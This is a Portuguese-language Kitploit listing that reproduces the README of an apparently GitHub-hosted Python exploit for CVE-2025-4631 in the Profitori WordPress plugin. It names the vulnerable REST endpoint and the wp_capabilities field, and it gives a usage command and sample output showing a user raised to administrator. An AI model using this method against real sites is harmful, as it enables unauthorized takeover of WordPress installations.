Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-4631 — Profitori 2.0.6.0 - 2.1.1.3 - Autorização Ausente para Escalação de Privilégios Não Autenticada | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-4631
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e Educação
GitHubnxploited/cve-2025-4631

CVE-2025-4631

Profitori 2.0.6.0 - 2.1.1.3 - Autorização Ausente para Escalação de Privilégios Não Autenticada

Ver Repositório
1115há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚨 CVE-2025-4631 - Exploração de Escalação de Privilégio no Plugin Profitori WordPress

📌 Resumo da Vulnerabilidade

O Plugin Profitori (versões 2.0.6.0 a 2.1.1.3) é vulnerável a escalação de privilégio não autenticada devido a uma verificação de capacidade ausente no endpoint /wp-json/stocktend/v1/stocktend_object. Isso permite que atacantes remotos escalem os privilégios de usuários existentes (ou criem novos) manipulando diretamente o campo meta wp_capabilities.

  • CVE: CVE-2025-4631
  • Pontuação CVSS: 9.8 (Crítico)
  • Publicado: 30 de maio de 2025
  • Atualizado em: 31 de maio de 2025

🛠️ O que este Script Faz

Este exploit em Python automatiza o processo de escalação de privilégio:

  1. ✅ Verificando a versão do plugin através do arquivo readme.txt.
  2. 🚀 Explorando o endpoint REST API vulnerável se uma versão vulnerável for detectada.
  3. 📡 Enviando o payload para escalar os privilégios de um usuário para Administrador.
  4. 🧾 Imprimindo resultados detalhados e formatados, incluindo as credenciais do usuário modificado.

Se a verificação da versão falhar, o exploit prossegue com cautela e um aviso.


📸 Comprovação do Exploit

Comprovação do Exploit


💻 Uso

usage: CVE-2025-4631.py [-h] -u URL -id ID [--email EMAIL] [--name NAME] [--url_field URL_FIELD] [--verbose]

Exemplo:

python CVE-2025-4631.py -u http://nxploit.ddev.site -id 3

Exemplo de Saída:

[📄] Checking plugin version at: http://nxploit.ddev.site/wp-content/plugins/profitori/readme.txt
[✅] Vulnerable version detected: 2.1.1.3
[🚀] Exploiting in 3 seconds...
[📡] Sending privilege escalation request to: http://nxploit.ddev.site/wp-json/stocktend/v1/stocktend_object
[🎯] Exploit completed successfully!

[🧾] Updated User Information:
--------------------------------------
🆔 User ID         : 3
👤 Username        : subscriber
📧 Email           : [email protected]
🪪 Display Name    : Subscriber User
🔗 User URL        : 
🛡 Role Raw        : a:1:{s:13:"administrator";b:1;}

[👑] Exploit By : Nxploited (Khaled_alenazi)
🔗 GitHub       : https://github.com/Nxploited
📧 Email        : [email protected]

⚙️ Argumentos do Script

FlagDescriçãoObrigatório
-u, --url🌐 URL base do site WordPress✅ Sim
-id🆔 ID do usuário a ser escalado✅ Sim
--email📧 Email falso para exibir❌ Não
--name👤 Nome de exibição❌ Não
--url_field🔗 Campo de URL do usuário❌ Não
--verbose🔍 Imprimir resposta JSON completa❌ Não

📂 Requisitos

  • Python 3.x
  • Biblioteca requests

Instalar via:

pip install requests

⚠️ Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e de teste autorizados. Qualquer uso indevido deste exploit contra sistemas que você não possui ou para os quais não tem permissão explícita para testar é estritamente proibido. O criador não se responsabiliza por quaisquer danos ou consequências legais decorrentes do uso inadequado.


POR: Nxploited ( Khaled_Alenazi )

Baixar ferramenta